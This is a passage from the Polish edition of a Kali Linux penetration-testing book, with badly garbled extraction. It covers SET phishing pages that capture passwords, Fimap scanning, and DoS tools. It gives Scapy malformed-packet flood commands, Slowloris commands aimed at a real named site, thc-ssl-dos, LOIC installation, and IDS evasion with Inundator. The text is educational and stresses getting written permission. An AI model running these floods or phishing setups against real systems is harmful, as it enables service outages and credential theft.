Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
